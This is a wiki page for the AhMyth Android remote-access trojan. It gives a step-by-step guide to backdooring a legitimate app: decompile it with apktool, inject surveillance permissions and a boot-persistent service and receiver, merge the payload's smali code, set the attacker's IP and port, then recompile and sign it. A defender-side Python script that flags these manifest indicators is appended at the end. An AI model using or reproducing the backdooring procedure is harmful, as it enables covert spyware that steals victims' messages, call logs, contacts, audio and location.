
User Manual ‐ Manually Template Original Applications ‐ Boot Method

Morsmalleo edited this page Aug 23, 2023 · 21 revisions

Prerequisites

  • Apktool
  • A properly configured, decompiled AhMyth payload
  • Patience


Boot Method

  1. Decompile the original application using Apktool.
apktool d original.apk
java -jar apktool.jar d original.apk

  1. Enter the decompiled application folder and open the AndroidManifest.xml file in an editor such as Visual Studio Code or Sublime.

  1. Copy the payload permissions from the "Payload Permissions" dropdown tab below, add them alongside the original application's existing permissions, then save the file. See the dropdown "Help" tab for an example if you get stuck.
Payload Permissions
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
<uses-permission android:name="android.permission.INSTALL_PACKAGE"/>

ℹ️ Help

Original Manifest Before Payload Permissions Injection

[Image: Permissions Injection - Before]

Original Manifest After Payload Permissions Injection

The Injected Payload Permissions are Highlighted in Red 🔴

[Image: Permissions Injection - After]

  1. Copy the payload Service below and add it alongside the application's existing services. If there are no existing services in the original application's manifest, insert it just before the closing </application> tag instead, then save the file. Follow the dropdown "Help" example for further help.
<service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/>
ℹ️ Help

If the manifest contains existing services, then we're going to need to insert the payload service just after the original application's last existing service in the manifest, like so:

Original Manifest With Existing Services, Before Payload Service Injection

[Image: Service Injection - Application Tag - Before]

Original Manifest With Existing Services, After Payload Service Injection

The Injected Payload Service is highlighted in Red 🔴 while the application's last existing Service is highlighted in Blue 🔵

If the manifest does not contain any existing services, then insert the payload service just before the closing </application> tag in the manifest, like so:

Original Manifest Without Existing Services, Before Payload Service Injection

[Image: Service Injection - Application Tag - Before]

Original Manifest Without Existing Services, After Payload Service Injection

The Injected Payload Service is Highlighted in Red 🔴 while the application's closing </application> tag is highlighted in Blue 🔵

[Image: Service Injection - Application Tag - After]

  1. Copy the payload Receiver below and add it alongside the application's existing receivers. If there are no existing receivers in the original application's manifest, insert it before the closing </application> tag but after the previously injected payload Service, then save the file. Follow the dropdown "Help" example for further help.
<receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver">
    <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
    </intent-filter>
</receiver>
ℹ️ Help

If the original application's manifest contains existing receivers, then insert the payload receiver just after the application's last existing receiver, like so:

Original Manifest With Existing Receivers, Before Payload Receiver Injection

[Image: Receiver Injection - Application Tag - Before]

Original Manifest With Existing Receivers, After Payload Receiver Injection

The Injected Payload Receiver is highlighted in Red 🔴 while the application's last existing receiver tag is highlighted in Blue 🔵, along with the previously injected payload Service, which is highlighted in Green 🟢

If the manifest does not contain any existing receivers, then insert the payload receiver just before the closing </application> tag in the manifest, like so:

Original Manifest Without Existing Receivers, Before Payload Receiver Injection

[Image: Receiver Injection - Application Tag - Before]

Original Manifest Without Existing Receivers, After Payload Receiver Injection

The Injected Payload Receiver is highlighted in Red 🔴 while the closing </application> tag is highlighted in Blue 🔵, along with the previously injected payload Service, which is highlighted in Green 🟢

[Image: Receiver Injection - Application Tag - After]

  1. Head into the Decompiled APK folder of your AhMyth Payload and enter the smali directory.

  1. Copy the payload folders inside the smali directory, excluding the android and androidx folders; these will be copied over later on.

  1. Head back into the decompiled original application we're backdooring and create a new smali_classes(X) directory (where "(X)" refers to the directory's respective numbering). Click the dropdown tab below for more information about creating smali_classes(X) directories appropriately.
ℹ️ Creating "smali_classes(X)" Directories Appropriately

Creating smali_classes(X) directories isn't as hard as it sounds.

If the decompiled original application contains only one smali directory, then this directory will always be titled "smali". In that case all we need to do is create a new "smali_classes2" directory and paste our copied AhMyth payload folders into it.

Before

[Image: before]

After

[Image: after]

If the decompiled original application contains multiple smali directories, then we have a list of smali_classes(X) folders on our hands; you'll notice these directories are numbered as well.

So in order to create our new payload directory, all we need to do is follow the numbering of the directories: create a smali_classes(X) folder numbered one higher than the last existing smali_classes(X) folder. For example, if the last existing folder is smali_classes10, then we simply create the directory smali_classes11, and so on. The new directory's numbering should always be 1 more than the last existing smali_classes(X) folder.

Before

[Image: before]

After

[Image: after]

  1. Paste the copied AhMyth payload folders into the newly created smali_classes(X) directory.

  1. Head back into the smali folder of your decompiled AhMyth Payload, and copy the android & androidx folders.

  1. Paste the copied android & androidx folders into the smali folder of the decompiled original application, and replace files if prompted.

  1. After copying the android and androidx folders over to the smali directory of the decompiled original application, edit the IP:PORT file titled e.smali, located at smali_classesX/ahmyth/mine/king/ahmyth (where smali_classesX is the payload directory we created earlier for the AhMyth payload files). Apply your own IP address and port number, then save the file.

  1. Close everything, and recompile the backdoored application using Apktool.
apktool b original -o Ahmyth.apk
java -jar apktool.jar b original -o Ahmyth.apk

  1. Sign the backdoored application using an APK signer. We recommend Uber APK Signer, as it not only signs the APK but also zipaligns it before signing.
java -jar sign.jar -a path/to/Ahmyth.apk -o ~/path/to/output/folder
java -jar sign.jar -a path/to/folder/containing/the/payload
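A defender-side check, added here and not part of the AhMyth project or this guide: it parses a decoded AndroidManifest.xml (the file the steps above modify) and reports the indicators those steps leave behind, namely components in the ahmyth.mine.king.ahmyth package, an exported BOOT_COMPLETED receiver, and a cluster of the listed sensitive permissions. The sample manifest, the package name com.example.notes and the permission-count threshold are constructed for this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Component package used by the service and receiver snippets injected in this guide.
PAYLOAD_PACKAGE_PREFIX = "ahmyth.mine.king.ahmyth."
# Subset of the guide's "Payload Permissions" that an ordinary app rarely needs all at once.
SENSITIVE_PERMS = {
    "android.permission.READ_SMS", "android.permission.SEND_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.READ_CALL_LOG", "android.permission.READ_CONTACTS", "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA", "android.permission.ACCESS_FINE_LOCATION", "android.permission.RECEIVE_BOOT_COMPLETED",
}

def audit_manifest(xml_text):
    """Return a list of human-readable findings for a decoded AndroidManifest.xml string."""
    root = ET.fromstring(xml_text)
    findings = []
    requested = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}
    hits = sorted(requested & SENSITIVE_PERMS)
    if len(hits) >= 3:  # constructed heuristic threshold, tune to your own baseline
        findings.append(f"{len(hits)} sensitive permissions requested: {', '.join(hits)}")
    # Components whose class name lives in the payload package (the service and receiver steps above).
    for tag in ("service", "receiver", "activity"):
        for comp in root.iter(tag):
            name = comp.get(ANDROID_NS + "name", "")
            if name.startswith(PAYLOAD_PACKAGE_PREFIX):
                findings.append(f"{tag} {name} belongs to the AhMyth payload package")
    # An exported receiver that wakes on BOOT_COMPLETED is the persistence hook this guide installs.
    for rcv in root.iter("receiver"):
        actions = {a.get(ANDROID_NS + "name") for a in rcv.iter("action")}
        if "android.intent.action.BOOT_COMPLETED" in actions and rcv.get(ANDROID_NS + "exported") == "true":
            findings.append(f"exported receiver {rcv.get(ANDROID_NS + 'name')} starts on BOOT_COMPLETED")
    return findings

# Constructed sample: a small notes app's manifest after the injection steps above were applied to it.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application android:label="Notes">
        <activity android:name="com.example.notes.MainActivity"/>
        <service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/>
        <receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver">
            <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
        </receiver>
    </application>
</manifest>"""
```

Run `audit_manifest` over the manifest produced by `apktool d` on any APK you are reviewing; the new smali_classes(X) directory the guide creates is a second indicator worth checking on disk alongside these manifest findings.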